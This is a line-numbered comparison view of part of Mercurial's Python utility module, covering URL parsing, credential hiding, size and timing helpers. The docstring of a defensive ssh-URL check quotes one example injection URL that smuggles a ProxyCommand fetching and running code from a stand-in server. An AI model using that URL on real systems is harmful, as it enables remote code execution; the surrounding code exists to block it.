2735 looked up using socket.getservbyname(). If there's no matching
2727 service, error.Abort is raised.
2736 service, error.Abort is raised.
2728 """
2737 """
2729 try:
2738 try:
2730 return int(port)
2739 return int(port)
2731 except ValueError:
2740 except ValueError:
2732 pass
2741 pass
2733
2742
2734 try:
2743 try:
2735 return socket.getservbyname(pycompat.sysstr(port))
2744 return socket.getservbyname(pycompat.sysstr(port))
2736 except socket.error:
2745 except socket.error:
2737 raise Abort(_("no port number associated with service '%s'") % port)
2746 raise Abort(_("no port number associated with service '%s'") % port)
2738
2747
2739 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2748 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2740 '0': False, 'no': False, 'false': False, 'off': False,
2749 '0': False, 'no': False, 'false': False, 'off': False,
2741 'never': False}
2750 'never': False}
2742
2751
2743 def parsebool(s):
2752 def parsebool(s):
2744 """Parse s into a boolean.
2753 """Parse s into a boolean.
2745
2754
2746 If s is not a valid boolean, returns None.
2755 If s is not a valid boolean, returns None.
2747 """
2756 """
2748 return _booleans.get(s.lower(), None)
2757 return _booleans.get(s.lower(), None)
2749
2758
2750 _hextochr = dict((a + b, chr(int(a + b, 16)))
2759 _hextochr = dict((a + b, chr(int(a + b, 16)))
2751 for a in string.hexdigits for b in string.hexdigits)
2760 for a in string.hexdigits for b in string.hexdigits)
2752
2761
2753 class url(object):
2762 class url(object):
2754 r"""Reliable URL parser.
2763 r"""Reliable URL parser.
2755
2764
2756 This parses URLs and provides attributes for the following
2765 This parses URLs and provides attributes for the following
2757 components:
2766 components:
2758
2767
2759 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2768 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2760
2769
2761 Missing components are set to None. The only exception is
2770 Missing components are set to None. The only exception is
2762 fragment, which is set to '' if present but empty.
2771 fragment, which is set to '' if present but empty.
2763
2772
2764 If parsefragment is False, fragment is included in query. If
2773 If parsefragment is False, fragment is included in query. If
2765 parsequery is False, query is included in path. If both are
2774 parsequery is False, query is included in path. If both are
2766 False, both fragment and query are included in path.
2775 False, both fragment and query are included in path.
2767
2776
2768 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2777 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2769
2778
2770 Note that for backward compatibility reasons, bundle URLs do not
2779 Note that for backward compatibility reasons, bundle URLs do not
2771 take host names. That means 'bundle://../' has a path of '../'.
2780 take host names. That means 'bundle://../' has a path of '../'.
2772
2781
2773 Examples:
2782 Examples:
2774
2783
2775 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2784 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2776 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2785 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2777 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2786 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2778 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2787 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2779 >>> url(b'file:///home/joe/repo')
2788 >>> url(b'file:///home/joe/repo')
2780 <url scheme: 'file', path: '/home/joe/repo'>
2789 <url scheme: 'file', path: '/home/joe/repo'>
2781 >>> url(b'file:///c:/temp/foo/')
2790 >>> url(b'file:///c:/temp/foo/')
2782 <url scheme: 'file', path: 'c:/temp/foo/'>
2791 <url scheme: 'file', path: 'c:/temp/foo/'>
2783 >>> url(b'bundle:foo')
2792 >>> url(b'bundle:foo')
2784 <url scheme: 'bundle', path: 'foo'>
2793 <url scheme: 'bundle', path: 'foo'>
2785 >>> url(b'bundle://../foo')
2794 >>> url(b'bundle://../foo')
2786 <url scheme: 'bundle', path: '../foo'>
2795 <url scheme: 'bundle', path: '../foo'>
2787 >>> url(br'c:\foo\bar')
2796 >>> url(br'c:\foo\bar')
2788 <url path: 'c:\\foo\\bar'>
2797 <url path: 'c:\\foo\\bar'>
2789 >>> url(br'\\blah\blah\blah')
2798 >>> url(br'\\blah\blah\blah')
2790 <url path: '\\\\blah\\blah\\blah'>
2799 <url path: '\\\\blah\\blah\\blah'>
2791 >>> url(br'\\blah\blah\blah#baz')
2800 >>> url(br'\\blah\blah\blah#baz')
2792 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2801 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2793 >>> url(br'file:///C:\users\me')
2802 >>> url(br'file:///C:\users\me')
2794 <url scheme: 'file', path: 'C:\\users\\me'>
2803 <url scheme: 'file', path: 'C:\\users\\me'>
2795
2804
2796 Authentication credentials:
2805 Authentication credentials:
2797
2806
2798 >>> url(b'ssh://joe:xyz@x/repo')
2807 >>> url(b'ssh://joe:xyz@x/repo')
2799 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2808 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2800 >>> url(b'ssh://joe@x/repo')
2809 >>> url(b'ssh://joe@x/repo')
2801 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2810 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2802
2811
2803 Query strings and fragments:
2812 Query strings and fragments:
2804
2813
2805 >>> url(b'http://host/a?b#c')
2814 >>> url(b'http://host/a?b#c')
2806 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2815 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2807 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2816 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2808 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2817 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2809
2818
2810 Empty path:
2819 Empty path:
2811
2820
2812 >>> url(b'')
2821 >>> url(b'')
2813 <url path: ''>
2822 <url path: ''>
2814 >>> url(b'#a')
2823 >>> url(b'#a')
2815 <url path: '', fragment: 'a'>
2824 <url path: '', fragment: 'a'>
2816 >>> url(b'http://host/')
2825 >>> url(b'http://host/')
2817 <url scheme: 'http', host: 'host', path: ''>
2826 <url scheme: 'http', host: 'host', path: ''>
2818 >>> url(b'http://host/#a')
2827 >>> url(b'http://host/#a')
2819 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2828 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2820
2829
2821 Only scheme:
2830 Only scheme:
2822
2831
2823 >>> url(b'http:')
2832 >>> url(b'http:')
2824 <url scheme: 'http'>
2833 <url scheme: 'http'>
2825 """
2834 """
2826
2835
2827 _safechars = "!~*'()+"
2836 _safechars = "!~*'()+"
2828 _safepchars = "/!~*'()+:\\"
2837 _safepchars = "/!~*'()+:\\"
2829 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2838 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2830
2839
2831 def __init__(self, path, parsequery=True, parsefragment=True):
2840 def __init__(self, path, parsequery=True, parsefragment=True):
2832 # We slowly chomp away at path until we have only the path left
2841 # We slowly chomp away at path until we have only the path left
2833 self.scheme = self.user = self.passwd = self.host = None
2842 self.scheme = self.user = self.passwd = self.host = None
2834 self.port = self.path = self.query = self.fragment = None
2843 self.port = self.path = self.query = self.fragment = None
2835 self._localpath = True
2844 self._localpath = True
2836 self._hostport = ''
2845 self._hostport = ''
2837 self._origpath = path
2846 self._origpath = path
2838
2847
2839 if parsefragment and '#' in path:
2848 if parsefragment and '#' in path:
2840 path, self.fragment = path.split('#', 1)
2849 path, self.fragment = path.split('#', 1)
2841
2850
2842 # special case for Windows drive letters and UNC paths
2851 # special case for Windows drive letters and UNC paths
2843 if hasdriveletter(path) or path.startswith('\\\\'):
2852 if hasdriveletter(path) or path.startswith('\\\\'):
2844 self.path = path
2853 self.path = path
2845 return
2854 return
2846
2855
2847 # For compatibility reasons, we can't handle bundle paths as
2856 # For compatibility reasons, we can't handle bundle paths as
2848 # normal URLS
2857 # normal URLS
2849 if path.startswith('bundle:'):
2858 if path.startswith('bundle:'):
2850 self.scheme = 'bundle'
2859 self.scheme = 'bundle'
2851 path = path[7:]
2860 path = path[7:]
2852 if path.startswith('//'):
2861 if path.startswith('//'):
2853 path = path[2:]
2862 path = path[2:]
2854 self.path = path
2863 self.path = path
2855 return
2864 return
2856
2865
2857 if self._matchscheme(path):
2866 if self._matchscheme(path):
2858 parts = path.split(':', 1)
2867 parts = path.split(':', 1)
2859 if parts[0]:
2868 if parts[0]:
2860 self.scheme, path = parts
2869 self.scheme, path = parts
2861 self._localpath = False
2870 self._localpath = False
2862
2871
2863 if not path:
2872 if not path:
2864 path = None
2873 path = None
2865 if self._localpath:
2874 if self._localpath:
2866 self.path = ''
2875 self.path = ''
2867 return
2876 return
2868 else:
2877 else:
2869 if self._localpath:
2878 if self._localpath:
2870 self.path = path
2879 self.path = path
2871 return
2880 return
2872
2881
2873 if parsequery and '?' in path:
2882 if parsequery and '?' in path:
2874 path, self.query = path.split('?', 1)
2883 path, self.query = path.split('?', 1)
2875 if not path:
2884 if not path:
2876 path = None
2885 path = None
2877 if not self.query:
2886 if not self.query:
2878 self.query = None
2887 self.query = None
2879
2888
2880 # // is required to specify a host/authority
2889 # // is required to specify a host/authority
2881 if path and path.startswith('//'):
2890 if path and path.startswith('//'):
2882 parts = path[2:].split('/', 1)
2891 parts = path[2:].split('/', 1)
2883 if len(parts) > 1:
2892 if len(parts) > 1:
2884 self.host, path = parts
2893 self.host, path = parts
2885 else:
2894 else:
2886 self.host = parts[0]
2895 self.host = parts[0]
2887 path = None
2896 path = None
2888 if not self.host:
2897 if not self.host:
2889 self.host = None
2898 self.host = None
2890 # path of file:///d is /d
2899 # path of file:///d is /d
2891 # path of file:///d:/ is d:/, not /d:/
2900 # path of file:///d:/ is d:/, not /d:/
2892 if path and not hasdriveletter(path):
2901 if path and not hasdriveletter(path):
2893 path = '/' + path
2902 path = '/' + path
2894
2903
2895 if self.host and '@' in self.host:
2904 if self.host and '@' in self.host:
2896 self.user, self.host = self.host.rsplit('@', 1)
2905 self.user, self.host = self.host.rsplit('@', 1)
2897 if ':' in self.user:
2906 if ':' in self.user:
2898 self.user, self.passwd = self.user.split(':', 1)
2907 self.user, self.passwd = self.user.split(':', 1)
2899 if not self.host:
2908 if not self.host:
2900 self.host = None
2909 self.host = None
2901
2910
2902 # Don't split on colons in IPv6 addresses without ports
2911 # Don't split on colons in IPv6 addresses without ports
2903 if (self.host and ':' in self.host and
2912 if (self.host and ':' in self.host and
2904 not (self.host.startswith('[') and self.host.endswith(']'))):
2913 not (self.host.startswith('[') and self.host.endswith(']'))):
2905 self._hostport = self.host
2914 self._hostport = self.host
2906 self.host, self.port = self.host.rsplit(':', 1)
2915 self.host, self.port = self.host.rsplit(':', 1)
2907 if not self.host:
2916 if not self.host:
2908 self.host = None
2917 self.host = None
2909
2918
2910 if (self.host and self.scheme == 'file' and
2919 if (self.host and self.scheme == 'file' and
2911 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2920 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2912 raise Abort(_('file:// URLs can only refer to localhost'))
2921 raise Abort(_('file:// URLs can only refer to localhost'))
2913
2922
2914 self.path = path
2923 self.path = path
2915
2924
2916 # leave the query string escaped
2925 # leave the query string escaped
2917 for a in ('user', 'passwd', 'host', 'port',
2926 for a in ('user', 'passwd', 'host', 'port',
2918 'path', 'fragment'):
2927 'path', 'fragment'):
2919 v = getattr(self, a)
2928 v = getattr(self, a)
2920 if v is not None:
2929 if v is not None:
2921 setattr(self, a, urlreq.unquote(v))
2930 setattr(self, a, urlreq.unquote(v))
2922
2931
2923 @encoding.strmethod
2932 @encoding.strmethod
2924 def __repr__(self):
2933 def __repr__(self):
2925 attrs = []
2934 attrs = []
2926 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2935 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2927 'query', 'fragment'):
2936 'query', 'fragment'):
2928 v = getattr(self, a)
2937 v = getattr(self, a)
2929 if v is not None:
2938 if v is not None:
2930 attrs.append('%s: %r' % (a, v))
2939 attrs.append('%s: %r' % (a, v))
2931 return '<url %s>' % ', '.join(attrs)
2940 return '<url %s>' % ', '.join(attrs)
2932
2941
2933 def __bytes__(self):
2942 def __bytes__(self):
2934 r"""Join the URL's components back into a URL string.
2943 r"""Join the URL's components back into a URL string.
2935
2944
2936 Examples:
2945 Examples:
2937
2946
2938 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2947 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2939 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2948 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2940 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2949 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2941 'http://user:pw@host:80/?foo=bar&baz=42'
2950 'http://user:pw@host:80/?foo=bar&baz=42'
2942 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2951 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2943 'http://user:pw@host:80/?foo=bar%3dbaz'
2952 'http://user:pw@host:80/?foo=bar%3dbaz'
2944 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2953 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2945 'ssh://user:pw@[::1]:2200//home/joe#'
2954 'ssh://user:pw@[::1]:2200//home/joe#'
2946 >>> bytes(url(b'http://localhost:80//'))
2955 >>> bytes(url(b'http://localhost:80//'))
2947 'http://localhost:80//'
2956 'http://localhost:80//'
2948 >>> bytes(url(b'http://localhost:80/'))
2957 >>> bytes(url(b'http://localhost:80/'))
2949 'http://localhost:80/'
2958 'http://localhost:80/'
2950 >>> bytes(url(b'http://localhost:80'))
2959 >>> bytes(url(b'http://localhost:80'))
2951 'http://localhost:80/'
2960 'http://localhost:80/'
2952 >>> bytes(url(b'bundle:foo'))
2961 >>> bytes(url(b'bundle:foo'))
2953 'bundle:foo'
2962 'bundle:foo'
2954 >>> bytes(url(b'bundle://../foo'))
2963 >>> bytes(url(b'bundle://../foo'))
2955 'bundle:../foo'
2964 'bundle:../foo'
2956 >>> bytes(url(b'path'))
2965 >>> bytes(url(b'path'))
2957 'path'
2966 'path'
2958 >>> bytes(url(b'file:///tmp/foo/bar'))
2967 >>> bytes(url(b'file:///tmp/foo/bar'))
2959 'file:///tmp/foo/bar'
2968 'file:///tmp/foo/bar'
2960 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2969 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2961 'file:///c:/tmp/foo/bar'
2970 'file:///c:/tmp/foo/bar'
2962 >>> print(url(br'bundle:foo\bar'))
2971 >>> print(url(br'bundle:foo\bar'))
2963 bundle:foo\bar
2972 bundle:foo\bar
2964 >>> print(url(br'file:///D:\data\hg'))
2973 >>> print(url(br'file:///D:\data\hg'))
2965 file:///D:\data\hg
2974 file:///D:\data\hg
2966 """
2975 """
2967 if self._localpath:
2976 if self._localpath:
2968 s = self.path
2977 s = self.path
2969 if self.scheme == 'bundle':
2978 if self.scheme == 'bundle':
2970 s = 'bundle:' + s
2979 s = 'bundle:' + s
2971 if self.fragment:
2980 if self.fragment:
2972 s += '#' + self.fragment
2981 s += '#' + self.fragment
2973 return s
2982 return s
2974
2983
2975 s = self.scheme + ':'
2984 s = self.scheme + ':'
2976 if self.user or self.passwd or self.host:
2985 if self.user or self.passwd or self.host:
2977 s += '//'
2986 s += '//'
2978 elif self.scheme and (not self.path or self.path.startswith('/')
2987 elif self.scheme and (not self.path or self.path.startswith('/')
2979 or hasdriveletter(self.path)):
2988 or hasdriveletter(self.path)):
2980 s += '//'
2989 s += '//'
2981 if hasdriveletter(self.path):
2990 if hasdriveletter(self.path):
2982 s += '/'
2991 s += '/'
2983 if self.user:
2992 if self.user:
2984 s += urlreq.quote(self.user, safe=self._safechars)
2993 s += urlreq.quote(self.user, safe=self._safechars)
2985 if self.passwd:
2994 if self.passwd:
2986 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2995 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2987 if self.user or self.passwd:
2996 if self.user or self.passwd:
2988 s += '@'
2997 s += '@'
2989 if self.host:
2998 if self.host:
2990 if not (self.host.startswith('[') and self.host.endswith(']')):
2999 if not (self.host.startswith('[') and self.host.endswith(']')):
2991 s += urlreq.quote(self.host)
3000 s += urlreq.quote(self.host)
2992 else:
3001 else:
2993 s += self.host
3002 s += self.host
2994 if self.port:
3003 if self.port:
2995 s += ':' + urlreq.quote(self.port)
3004 s += ':' + urlreq.quote(self.port)
2996 if self.host:
3005 if self.host:
2997 s += '/'
3006 s += '/'
2998 if self.path:
3007 if self.path:
2999 # TODO: similar to the query string, we should not unescape the
3008 # TODO: similar to the query string, we should not unescape the
3000 # path when we store it, the path might contain '%2f' = '/',
3009 # path when we store it, the path might contain '%2f' = '/',
3001 # which we should *not* escape.
3010 # which we should *not* escape.
3002 s += urlreq.quote(self.path, safe=self._safepchars)
3011 s += urlreq.quote(self.path, safe=self._safepchars)
3003 if self.query:
3012 if self.query:
3004 # we store the query in escaped form.
3013 # we store the query in escaped form.
3005 s += '?' + self.query
3014 s += '?' + self.query
3006 if self.fragment is not None:
3015 if self.fragment is not None:
3007 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3016 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3008 return s
3017 return s
3009
3018
3010 __str__ = encoding.strmethod(__bytes__)
3019 __str__ = encoding.strmethod(__bytes__)
3011
3020
3012 def authinfo(self):
3021 def authinfo(self):
3013 user, passwd = self.user, self.passwd
3022 user, passwd = self.user, self.passwd
3014 try:
3023 try:
3015 self.user, self.passwd = None, None
3024 self.user, self.passwd = None, None
3016 s = bytes(self)
3025 s = bytes(self)
3017 finally:
3026 finally:
3018 self.user, self.passwd = user, passwd
3027 self.user, self.passwd = user, passwd
3019 if not self.user:
3028 if not self.user:
3020 return (s, None)
3029 return (s, None)
3021 # authinfo[1] is passed to urllib2 password manager, and its
3030 # authinfo[1] is passed to urllib2 password manager, and its
3022 # URIs must not contain credentials. The host is passed in the
3031 # URIs must not contain credentials. The host is passed in the
3023 # URIs list because Python < 2.4.3 uses only that to search for
3032 # URIs list because Python < 2.4.3 uses only that to search for
3024 # a password.
3033 # a password.
3025 return (s, (None, (s, self.host),
3034 return (s, (None, (s, self.host),
3026 self.user, self.passwd or ''))
3035 self.user, self.passwd or ''))
3027
3036
3028 def isabs(self):
3037 def isabs(self):
3029 if self.scheme and self.scheme != 'file':
3038 if self.scheme and self.scheme != 'file':
3030 return True # remote URL
3039 return True # remote URL
3031 if hasdriveletter(self.path):
3040 if hasdriveletter(self.path):
3032 return True # absolute for our purposes - can't be joined()
3041 return True # absolute for our purposes - can't be joined()
3033 if self.path.startswith(br'\\'):
3042 if self.path.startswith(br'\\'):
3034 return True # Windows UNC path
3043 return True # Windows UNC path
3035 if self.path.startswith('/'):
3044 if self.path.startswith('/'):
3036 return True # POSIX-style
3045 return True # POSIX-style
3037 return False
3046 return False
3038
3047
3039 def localpath(self):
3048 def localpath(self):
3040 if self.scheme == 'file' or self.scheme == 'bundle':
3049 if self.scheme == 'file' or self.scheme == 'bundle':
3041 path = self.path or '/'
3050 path = self.path or '/'
3042 # For Windows, we need to promote hosts containing drive
3051 # For Windows, we need to promote hosts containing drive
3043 # letters to paths with drive letters.
3052 # letters to paths with drive letters.
3044 if hasdriveletter(self._hostport):
3053 if hasdriveletter(self._hostport):
3045 path = self._hostport + '/' + self.path
3054 path = self._hostport + '/' + self.path
3046 elif (self.host is not None and self.path
3055 elif (self.host is not None and self.path
3047 and not hasdriveletter(path)):
3056 and not hasdriveletter(path)):
3048 path = '/' + path
3057 path = '/' + path
3049 return path
3058 return path
3050 return self._origpath
3059 return self._origpath
3051
3060
3052 def islocal(self):
3061 def islocal(self):
3053 '''whether localpath will return something that posixfile can open'''
3062 '''whether localpath will return something that posixfile can open'''
3054 return (not self.scheme or self.scheme == 'file'
3063 return (not self.scheme or self.scheme == 'file'
3055 or self.scheme == 'bundle')
3064 or self.scheme == 'bundle')
3056
3065
3057 def hasscheme(path):
3066 def hasscheme(path):
3058 return bool(url(path).scheme)
3067 return bool(url(path).scheme)
3059
3068
3060 def hasdriveletter(path):
3069 def hasdriveletter(path):
3061 return path and path[1:2] == ':' and path[0:1].isalpha()
3070 return path and path[1:2] == ':' and path[0:1].isalpha()
3062
3071
3063 def urllocalpath(path):
3072 def urllocalpath(path):
3064 return url(path, parsequery=False, parsefragment=False).localpath()
3073 return url(path, parsequery=False, parsefragment=False).localpath()
3065
3074
3066 def checksafessh(path):
3075 def checksafessh(path):
3067 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3076 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3068
3077
3069 This is a sanity check for ssh urls. ssh will parse the first item as
3078 This is a sanity check for ssh urls. ssh will parse the first item as
3070 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3079 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3071 Let's prevent these potentially exploited urls entirely and warn the
3080 Let's prevent these potentially exploited urls entirely and warn the
3072 user.
3081 user.
3073
3082
3074 Raises an error.Abort when the url is unsafe.
3083 Raises an error.Abort when the url is unsafe.
3075 """
3084 """
3076 path = urlreq.unquote(path)
3085 path = urlreq.unquote(path)
3077 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3086 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3078 raise error.Abort(_('potentially unsafe url: %r') %
3087 raise error.Abort(_('potentially unsafe url: %r') %
3079 (path,))
3088 (path,))
3080
3089
3081 def hidepassword(u):
3090 def hidepassword(u):
3082 '''hide user credential in a url string'''
3091 '''hide user credential in a url string'''
3083 u = url(u)
3092 u = url(u)
3084 if u.passwd:
3093 if u.passwd:
3085 u.passwd = '***'
3094 u.passwd = '***'
3086 return bytes(u)
3095 return bytes(u)
3087
3096
3088 def removeauth(u):
3097 def removeauth(u):
3089 '''remove all authentication information from a url string'''
3098 '''remove all authentication information from a url string'''
3090 u = url(u)
3099 u = url(u)
3091 u.user = u.passwd = None
3100 u.user = u.passwd = None
3092 return str(u)
3101 return str(u)
3093
3102
3094 timecount = unitcountfn(
3103 timecount = unitcountfn(
3095 (1, 1e3, _('%.0f s')),
3104 (1, 1e3, _('%.0f s')),
3096 (100, 1, _('%.1f s')),
3105 (100, 1, _('%.1f s')),
3097 (10, 1, _('%.2f s')),
3106 (10, 1, _('%.2f s')),
3098 (1, 1, _('%.3f s')),
3107 (1, 1, _('%.3f s')),
3099 (100, 0.001, _('%.1f ms')),
3108 (100, 0.001, _('%.1f ms')),
3100 (10, 0.001, _('%.2f ms')),
3109 (10, 0.001, _('%.2f ms')),
3101 (1, 0.001, _('%.3f ms')),
3110 (1, 0.001, _('%.3f ms')),
3102 (100, 0.000001, _('%.1f us')),
3111 (100, 0.000001, _('%.1f us')),
3103 (10, 0.000001, _('%.2f us')),
3112 (10, 0.000001, _('%.2f us')),
3104 (1, 0.000001, _('%.3f us')),
3113 (1, 0.000001, _('%.3f us')),
3105 (100, 0.000000001, _('%.1f ns')),
3114 (100, 0.000000001, _('%.1f ns')),
3106 (10, 0.000000001, _('%.2f ns')),
3115 (10, 0.000000001, _('%.2f ns')),
3107 (1, 0.000000001, _('%.3f ns')),
3116 (1, 0.000000001, _('%.3f ns')),
3108 )
3117 )
3109
3118
3110 _timenesting = [0]
3119 _timenesting = [0]
3111
3120
3112 def timed(func):
3121 def timed(func):
3113 '''Report the execution time of a function call to stderr.
3122 '''Report the execution time of a function call to stderr.
3114
3123
3115 During development, use as a decorator when you need to measure
3124 During development, use as a decorator when you need to measure
3116 the cost of a function, e.g. as follows:
3125 the cost of a function, e.g. as follows:
3117
3126
3118 @util.timed
3127 @util.timed
3119 def foo(a, b, c):
3128 def foo(a, b, c):
3120 pass
3129 pass
3121 '''
3130 '''
3122
3131
3123 def wrapper(*args, **kwargs):
3132 def wrapper(*args, **kwargs):
3124 start = timer()
3133 start = timer()
3125 indent = 2
3134 indent = 2
3126 _timenesting[0] += indent
3135 _timenesting[0] += indent
3127 try:
3136 try:
3128 return func(*args, **kwargs)
3137 return func(*args, **kwargs)
3129 finally:
3138 finally:
3130 elapsed = timer() - start
3139 elapsed = timer() - start
3131 _timenesting[0] -= indent
3140 _timenesting[0] -= indent
3132 stderr.write('%s%s: %s\n' %
3141 stderr.write('%s%s: %s\n' %
3133 (' ' * _timenesting[0], func.__name__,
3142 (' ' * _timenesting[0], func.__name__,
3134 timecount(elapsed)))
3143 timecount(elapsed)))
3135 return wrapper
3144 return wrapper
3136
3145
3137 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3146 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3138 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3147 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3139
3148
3140 def sizetoint(s):
3149 def sizetoint(s):
3141 '''Convert a space specifier to a byte count.
3150 '''Convert a space specifier to a byte count.
3142
3151
3143 >>> sizetoint(b'30')
3152 >>> sizetoint(b'30')
3144 30
3153 30
3145 >>> sizetoint(b'2.2kb')
3154 >>> sizetoint(b'2.2kb')
3146 2252
3155 2252
3147 >>> sizetoint(b'6M')
3156 >>> sizetoint(b'6M')
3148 6291456
3157 6291456
3149 '''
3158 '''
3150 t = s.strip().lower()
3159 t = s.strip().lower()
3151 try:
3160 try:
3152 for k, u in _sizeunits:
3161 for k, u in _sizeunits:
3153 if t.endswith(k):
3162 if t.endswith(k):
3154 return int(float(t[:-len(k)]) * u)
3163 return int(float(t[:-len(k)]) * u)
3155 return int(t)
3164 return int(t)
3156 except ValueError:
3165 except ValueError:
3157 raise error.ParseError(_("couldn't parse size: %s") % s)
3166 raise error.ParseError(_("couldn't parse size: %s") % s)
3158
3167
3159 class hooks(object):
3168 class hooks(object):
3160 '''A collection of hook functions that can be used to extend a
3169 '''A collection of hook functions that can be used to extend a
3161 function's behavior. Hooks are called in lexicographic order,
3170 function's behavior. Hooks are called in lexicographic order,
3162 based on the names of their sources.'''
3171 based on the names of their sources.'''
3163
3172
3164 def __init__(self):
3173 def __init__(self):
3165 self._hooks = []
3174 self._hooks = []
3166
3175
3167 def add(self, source, hook):
3176 def add(self, source, hook):
3168 self._hooks.append((source, hook))
3177 self._hooks.append((source, hook))
3169
3178
3170 def __call__(self, *args):
3179 def __call__(self, *args):
3171 self._hooks.sort(key=lambda x: x[0])
3180 self._hooks.sort(key=lambda x: x[0])
3172 results = []
3181 results = []
3173 for source, hook in self._hooks:
3182 for source, hook in self._hooks:
3174 results.append(hook(*args))
3183 results.append(hook(*args))
3175 return results
3184 return results
3176
3185
3177 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3186 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3178 '''Yields lines for a nicely formatted stacktrace.
3187 '''Yields lines for a nicely formatted stacktrace.
3179 Skips the 'skip' last entries, then return the last 'depth' entries.
3188 Skips the 'skip' last entries, then return the last 'depth' entries.
3180 Each file+linenumber is formatted according to fileline.
3189 Each file+linenumber is formatted according to fileline.
3181 Each line is formatted according to line.
3190 Each line is formatted according to line.
3182 If line is None, it yields:
3191 If line is None, it yields:
3183 length of longest filepath+line number,
3192 length of longest filepath+line number,
3184 filepath+linenumber,
3193 filepath+linenumber,
3185 function
3194 function
3186
3195
3187 Not be used in production code but very convenient while developing.
3196 Not be used in production code but very convenient while developing.
3188 '''
3197 '''
3189 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3198 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3190 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3199 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3191 ][-depth:]
3200 ][-depth:]
3192 if entries:
3201 if entries:
3193 fnmax = max(len(entry[0]) for entry in entries)
3202 fnmax = max(len(entry[0]) for entry in entries)
3194 for fnln, func in entries:
3203 for fnln, func in entries:
3195 if line is None:
3204 if line is None:
3196 yield (fnmax, fnln, func)
3205 yield (fnmax, fnln, func)
3197 else:
3206 else:
3198 yield line % (fnmax, fnln, func)
3207 yield line % (fnmax, fnln, func)
3199
3208
3200 def debugstacktrace(msg='stacktrace', skip=0,
3209 def debugstacktrace(msg='stacktrace', skip=0,
3201 f=stderr, otherf=stdout, depth=0):
3210 f=stderr, otherf=stdout, depth=0):
3202 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3211 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3203 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3212 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3204 By default it will flush stdout first.
3213 By default it will flush stdout first.
3205 It can be used everywhere and intentionally does not require an ui object.
3214 It can be used everywhere and intentionally does not require an ui object.
3206 Not be used in production code but very convenient while developing.
3215 Not be used in production code but very convenient while developing.
3207 '''
3216 '''
3208 if otherf:
3217 if otherf:
3209 otherf.flush()
3218 otherf.flush()
3210 f.write('%s at:\n' % msg.rstrip())
3219 f.write('%s at:\n' % msg.rstrip())
